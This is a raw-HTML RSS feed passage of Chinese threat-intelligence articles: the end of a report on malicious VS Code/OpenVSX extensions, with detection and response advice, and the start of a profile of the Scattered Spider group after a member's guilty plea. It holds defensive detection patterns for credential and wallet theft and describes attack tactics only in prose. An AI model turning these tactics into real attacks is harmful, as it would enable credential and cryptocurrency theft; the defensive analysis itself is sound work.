rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">wallet</span></code><span leaf="">, </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">token</span></code><span leaf=""> 等变体（需配合 AI 辅助模式匹配）。</span></p></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">网络检测</span></strong><span leaf="">：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">监控 IDE 进程向 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">raw.githubusercontent.com</span></code><span leaf=""> 发起的 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.vsix</span></code><span leaf=""> 或 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.tar.gz</span></code><span leaf=""> 下载请求，对比 OpenVSX 官方更新源域名差异。</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2. 应急响应措施</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">隔离与清理</span></strong><p><span leaf="">立即卸载 Socket 公布的 73 个扩展清单；清理 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">~/.vscode/extensions</span></code><span leaf=""> 与 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">~/.openvsx</span></code><span leaf=""> 缓存目录。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">凭证轮换（强制）</span></strong><p><span leaf="">假设已沦陷，立即轮换所有 SSH 密钥、Git Token、AWS/GCP/Azure Access Key、数据库密码及加密货币钱包助记词。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">主机取证</span></strong><p><span leaf="">使用 EDR 回溯 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">extensionHost</span></code><span leaf=""> 进程树，检查是否存在持久化计划任务、注册表修改或隐藏账户；提取内存中的解密后载荷样本。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">流程加固</span></strong><p><span leaf="">实施 IDE 扩展企业级白名单；禁用自动更新，强制人工审核变更日志；对 OpenVSX/npm 依赖实施 SBOM 追踪与签名验证。</span></p></li></ol><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">八、未来趋势研判</span></h2><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">战术常态化与架构升级</span></strong><p><span leaf="">&#34;休眠供应链&#34;已成为高级财务型攻击的标准配置。未来载荷将进一步向 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">WASM（WebAssembly）</span></strong><span leaf=""> 或 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Rust/Zig 编译的二进制</span></strong><span leaf=""> 迁移，利用跨平台兼容性与更难逆向的特性对抗静态分析。动态加载将结合 AI 生成的多态混淆，实现&#34;一机一密&#34;。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">生态横向渗透</span></strong><p><span leaf="">攻击者将加速复制该模型至 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">PyPI、RubyGems、Cargo、Maven</span></strong><span leaf=""> 等包管理器。针对 Go/Java 生态的供应链投毒将增加 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">vendor/</span></code><span leaf=""> 目录篡改与模块替换手法。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">防御博弈升级</span></strong><p><span leaf="">扩展市场将引入 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">动态沙箱更新验证</span></strong><span leaf="">（对比更新前后代码 Diff）、发布者身份强校验与行为基线监控。攻击者将采用 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">条件触发器</span></strong><span leaf="">（如仅当检测到特定地理 IP、企业域名后缀或反沙箱环境时才激活载荷）以延长存活期。</span></p></li><li style="overflow-wrap: break-word;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">战略建议</span></strong><p><span leaf="">组织需从&#34;信任默认依赖&#34;转向 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">&#34;零信任依赖链&#34;</span></strong><span leaf="">。建立自动化 SBOM 监控、实施 IDE 网络微隔离、引入扩展行为审计代理（Extension Behavior Agent），并将开发者工作站纳入与生产服务器同等级的威胁检测体系。供应链安全已从代码审计扩展至 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">全生命周期运行时监控</span></strong><span leaf="">。</span></p></li></ol><div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;padding-left: 0px;padding-right: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="will-change: transform;box-sizing: border-box;"><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034911" data-ratio="0.5" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="gif" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=3e5b459e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqicUricknrucMJmwiatvibs66wtTeMq4biblsDUpO7rFa3t9HyWW1jWPW7dFzpZZ6YLledC1jiciaQuqx7gdMQiaOLQeJqIc6pp0Ria2AUE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.3</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9bb8d4d5&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518560%26idx%3D1%26sn%3D36e375fceb1ea472bc6b4261b0d889fb">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 28 Apr 2026 11:37:00 +0800</pubDate>
    </item>
    <item>
      <title>Scattered Spider核心成员认罪：深度解析以英语母语为主的网络犯罪组织的战术演进与地缘关联</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518549&amp;idx=1&amp;sn=2041f78684b77509a06560c6afd65c00</link>
      <description>2024年6月，苏格兰籍威胁行为体Tyler Robert Buchanan在西班牙被捕，后于2024年11月被美方正式起诉。2025年，美国司法部正式宣布该成员对参与Scattered Spider网络犯罪组织的相关指控认罪。</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-04-27 14:43</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8272d7df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq8TVhea2Nrqaf2K7iaWh2HftkOEUVRSeZccL5T7eyzcOnr3wy80ZJgsDgy1A3L0icD5tCfyHNENRKnoOXF3YT9jiaLicN1R0TE9v2Q%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2024年6月，苏格兰籍威胁行为体Tyler Robert Buchanan在西班牙被捕，后于2024年11月被美方正式起诉。2025年，美国司法部正式宣布该成员对参与Scattered Spider网络犯罪组织的相关指控认罪。</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">事件概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2024年6月，苏格兰籍威胁行为体Tyler Robert Buchanan在西班牙被捕，后于2024年11月被美方正式起诉。2025年，美国司法部正式宣布该成员对参与Scattered Spider网络犯罪组织的相关指控认罪。这一进展标志着针对以经济利益为导向的英语母语黑客组织的国际执法行动进入新阶段。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Buchanan（24岁，苏格兰邓迪人）在美国法庭承认以下罪行：与同谋者合谋入侵数十家企业的网络系统，通过短信钓鱼攻击（Smishing）窃取员工凭证和个人身份信息，结合SIM卡交换攻击（SIM Swapping）绕过双因素认证，最终从美国受害者处窃取至少800万美元加密货币。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁行为体深度画像：Scattered Spider</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Scattered Spider是一个以英语为母语、成员相对年轻的网络犯罪组织，因其独特的社工攻击风格而备受关注。该组织使用多个别名，包括Muddled Libra、Scatter Swine、Starfraud以及CrowdStrike命名的UNC3944。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心监测显示，Scattered Spider并非独立的网络犯罪实体，而是更广泛网络犯罪生态&#34;The Com&#34;的组成部分。这一归属关系解释了该组织为何能够获取高端攻击资源并与其他勒索软件组织形成协同关系。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">成员特征</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该组织成员以16-25岁的英语母语年轻人为主，这种年龄结构和语言背景使其在针对欧美企业的社工攻击中具有独特优势。相比传统的东欧网络犯罪组织，Scattered Spider成员更熟悉西方企业文化和工作流程，能够设计出更具欺骗性的钓鱼话术。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">核心成员档案：</span></strong></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">成员</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">年龄</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">国籍</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">状态</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">备注</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Tyler Robert Buchanan</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">24</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">英国</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">认罪，待宣判</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">核心策划者</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Noah Michael Urban</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">-</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">美国</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">已判10年</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2024年8月判刑</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Ahmed Hossam Eldin Elbadawy</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">23</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">美国（德克萨斯）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">起诉在审</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">-</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Evans Onyeaka Osiebo</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">20</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">美国（德克萨斯）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">起诉在审</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">-</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Joel Martin Evans</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">25</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 